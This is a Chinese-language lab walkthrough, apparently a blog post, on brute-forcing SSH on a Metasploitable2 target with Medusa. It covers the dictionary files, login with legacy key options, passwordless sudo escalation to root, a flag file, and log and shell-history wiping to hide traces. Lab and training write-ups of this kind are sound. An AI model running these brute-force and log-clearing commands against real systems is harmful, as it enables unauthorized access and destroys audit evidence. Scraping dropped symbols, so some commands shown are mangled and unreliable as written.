2026/4/18 15:33:02
网站建设
项目流程
郑州营销网站托管,怎么做自己公司的网站,通过服务推广网站的案例,北京编程培训学校哪个好一、学习目标掌握SSH服务弱口令破解的核心逻辑#xff08;字典遍历自动化工具验证#xff09;熟练使用Medusa#xff08;美杜莎#xff09;工具破解SSH弱口令#xff08;避开Hydra兼容性坑#xff09;解决新版Kali与旧版OpenSSH的兼容性问题#xff08;密钥类型、加密算…一、学习目标掌握SSH服务弱口令破解的核心逻辑字典遍历自动化工具验证熟练使用Medusa美杜莎工具破解SSH弱口令避开Hydra兼容性坑解决新版Kali与旧版OpenSSH的兼容性问题密钥类型、加密算法不匹配完成“信息收集→破解→登录→提权→插旗→清日志”的完整渗透闭环记住实战中常见报错的解决方案形成可复现的操作流程二、前置基础信息1. 端口核心信息端口号22/TCP服务类型SSHSecure Shell安全外壳协议服务版本OpenSSH 4.7p1Debian/Ubuntu系统老旧版本无现代防护核心作用Linux服务器远程管理加密传输替代明文的Telnet2. 破解核心前提SSH服务支持“password密码认证”通过nmap脚本探测确认若仅支持“publickey密钥认证”则无法用弱口令破解需更换思路如寻找私钥文件。3. 工具选择主力工具Medusa美杜莎—— 轻量、对旧版SSH兼容性强操作逻辑与Hydra一致避开新版Hydra的加密算法不兼容问题。三、完整操作流程含代码实战细节阶段1信息收集确认靶机SSH服务状态目的验证22端口是否开放、SSH版本、支持的认证方式确保具备破解条件。操作步骤打开Kali终端执行nmap精准扫描命令nmap -sV -Pn -p22 --scriptssh-auth-methods 192.168.1.3关键结果解读必须满足以下条件22/tcp open ssh端口开放服务正常OpenSSH 4.7p1 Debian 8ubuntu1确认是老旧版本无防护Supported authentication methods: publickey、password支持密码认证可破解Host is up (延迟极低)靶机在线网络连通性正常细节注意若扫描显示“port closed”先检查靶机IP是否正确、是否启动、局域网是否互通用ping 192.168.1.3验证。阶段2准备破解字典核心字典质量决定成败目的制作包含靶机真实账号密码的“账号字典密码字典”覆盖Linux常见弱口令。操作步骤创建专门存放字典和结果的文件夹避免文件混乱mkdir /root/ssh_brute # 在root目录下创建ssh_brute文件夹验证执行ls /root/能看到ssh_brute文件夹即为成功。创建账号字典user.txt包含常见Linux账号vim /root/ssh_brute/user.txt # 用vim编辑账号字典操作按进入插入模式输入以下内容按后输入保存退出rootadminmsfadmintestubuntu验证执行cat /root/ssh_brute/user.txt输出与输入一致即为成功。创建密码字典pass.txt包含常见弱口令vim /root/ssh_brute/pass.txt # 用vim编辑密码字典操作按进入插入模式输入以下内容按后输入保存退出123456passwordrootadminmsfadmin12345验证执行cat /root/ssh_brute/pass.txt输出与输入一致即为成功。阶段3用Medusa破解SSH弱口令核心操作目的通过自动化工具遍历字典中的“账号密码”组合找到正确的登录凭证。操作步骤直接执行Medusa破解命令复制粘贴即可无需修改medusa -h 192.168.1.3 -U /root/ssh_brute/user.txt -P /root/ssh_brute/pass.txt -M ssh -v 4 -t 4 -O /root/ssh_brute/result.txt命令参数详解理解后方便记忆-h 192.168.1.3指定靶机IP-U /root/ssh_brute/user.txt指定账号字典大写U-P /root/ssh_brute/pass.txt指定密码字典大写P-M ssh指定破解模块为SSH核心自动适配SSH协议-v 4详细输出模式可看到每一次尝试的账号密码-t 4并发线程数为4避免线程过多导致靶机拒绝连接-O /root/ssh_brute/result.txt将破解结果保存到该文件观察破解结果成功标识 执行后会逐行尝试账号密码成功时会显示2026-01-11 19:57:25 ACCOUNT FOUND: [ssh] Host: 192.168.1.3 User: msfadmin Password: msfadmin [SUCCESS]验证破解结果cat /root/ssh_brute/result.txt # 查看保存的结果成功输出192.168.1.3:22:msfadmin:msfadmin阶段4用破解凭证登录SSH解决兼容性问题问题说明直接用ssh msfadmin192.168.1.3登录会报错Unable to negotiate with 192.168.1.3 port 22: no matching host key type found. Their offer: ssh-rsa,ssh-dss原因是新版Kali禁用了旧版SSH的ssh-rsa/ssh-dss密钥类型。解决方案带参数登录执行带兼容参数的登录命令复制粘贴ssh msfadmin192.168.1.3 -o HostKeyAlgorithmsssh-rsa -o PubkeyAcceptedKeyTypesssh-rsa参数详解解决密钥类型不兼容-o HostKeyAlgorithmsssh-rsa允许使用ssh-rsa旧主机密钥-o PubkeyAcceptedKeyTypesssh-rsa允许使用ssh-rsa公钥认证登录步骤首次登录提示Are you sure you want to continue connecting (yes/no/[fingerprint])? → 输入yes回车密码提示msfadmin192.168.1.3s password: → 输入破解的密码msfadmin回车验证登录成功 登录后提示符变为msfadminmetasploitable:~$whoami # 输出msfadmin确认当前用户阶段5提权到root靶机默认福利免密提权目的msfadmin是普通用户需提权到root最高权限才能完成插旗和日志清理。操作步骤在当前SSH会话中执行提权命令sudo su root # 切换到root用户无需输入密码原因Metasploitable2靶机默认配置msfadmin用户拥有免密sudo权限可执行sudo -l查看验证。验证root权限whoami # 输出root提权成功id # 输出uid0(root) gid0(root) groups0(root)确认最高权限阶段6插旗记录渗透成果目的创建专属标识文件证明已成功渗透靶机形成学习记录。操作步骤进入root目录最高权限目录不易被误删cd /root创建flag文件并写入渗透信息echo ssh_hack_success.flagecho 22端口SSH破解成功标识 ssh_hack_success.flagecho 靶机IP192.168.1.3 ssh_hack_success.flagecho 破解工具Medusa美杜莎 ssh_hack_success.flagecho 破解凭证msfadmin/msfadmin ssh_hack_success.flagecho 提权方式sudo su root免密sudo ssh_hack_success.flagecho 克服坑点新版Kali与旧SSH密钥类型不兼容→加ssh-rsa参数 ssh_hack_success.flagecho 渗透时间$(date) ssh_hack_success.flagecho 操作者43岁人生赢家实战派大佬 ssh_hack_success.flagecho ssh_hack_success.flag验证flag文件cat ssh_hack_success.flag # 查看文件内容确认信息完整阶段7清理日志无痕收尾目的清除渗透过程中留下的登录记录、操作痕迹避免被“管理员”发现。操作步骤一次性执行以下命令# 1. 清空登录/认证日志记录SSH登录、破解尝试 echo /var/log/auth.log echo /var/log/auth.log.1 # 2. 清空系统日志记录提权、进程操作 echo /var/log/syslog echo /var/log/syslog.1 # 3. 清空消息日志记录内核、服务事件 echo /var/log/messages echo /var/log/messages.1 # 4. 清空操作历史msfadmin和root的命令记录 echo /home/msfadmin/.bash_history echo /root/.bash_history # 5. 验证日志清空可选 ls -lh /var/log/ | grep -E auth|syslog|messages验证标准输出的日志文件大小均为0如-rw-r----- 1 root adm 0 Jan 11 20:05 auth.log说明清理成功。阶段8安全退出# 1. 退出root用户回到msfadmin exit # 2. 退出SSH会话回到Kali终端 exit # 3. 可选删除Kali本地的破解结果避免自身痕迹 rm -rf /root/ssh_brute/result.txt四、实战排错指南重点踩过的坑汇总1. 问题1Hydra破解报错“kex error : no match for method mac algo”原因新版Hydra与旧版OpenSSH加密算法/密钥交换算法不兼容解决方案放弃Hydra直接用Medusa工具兼容性更好操作更简单2. 问题2SSH登录报错“no matching host key type found”原因新版Kali禁用了旧版SSH的ssh-rsa/ssh-dss密钥类型解决方案登录时加参数ssh 用户名靶机IP -o HostKeyAlgorithmsssh-rsa -o PubkeyAcceptedKeyTypesssh-rsa3. 问题3Medusa破解无结果可能原因1字典中未包含正确的账号密码解决方案1补充字典如添加debian、ftp、mysql等常见账号111111、qwerty等弱密码可能原因2线程数过高靶机拒绝连接解决方案2将-t参数改为2-t 2降低并发线程4. 问题4sudo su root提权失败原因靶机配置被修改msfadmin的免密sudo权限丢失解决方案重启Metasploitable2靶机恢复默认配置五、核心知识点速记打印后快速复习用1. 核心流程信息收集nmap→ 准备字典user.txtpass.txt→ Medusa破解 → 带参数SSH登录 → sudo免密提权 → 插旗 → 清日志 → 退出2. 关键命令速记信息收集nmap -sV -Pn -p22 --scriptssh-auth-methods 192.168.1.3Medusa破解medusa -h 192.168.1.3 -U 账号字典 -P 密码字典 -M ssh -v 4 -t 4 -O 结果文件SSH登录ssh msfadmin192.168.1.3 -o HostKeyAlgorithmsssh-rsa -o PubkeyAcceptedKeyTypesssh-rsa提权sudo su root清日志核心命令echo /var/log/auth.logecho /home/msfadmin/.bash_history3. 核心原理SSH弱口令破解的本质是“暴力枚举”——利用自动化工具快速遍历常见账号密码组合找到符合目标服务器的有效凭证核心依赖高质量字典和工具兼容性。六、法律与伦理提醒本流程仅用于靶机学习禁止用于未授权的真实服务器渗透测试未经授权的网络攻击行为违反《网络安全法》《刑法》等法律法规需承担法律责任渗透测试必须在合法授权前提下进行坚守“告知同意”“最小权限”原则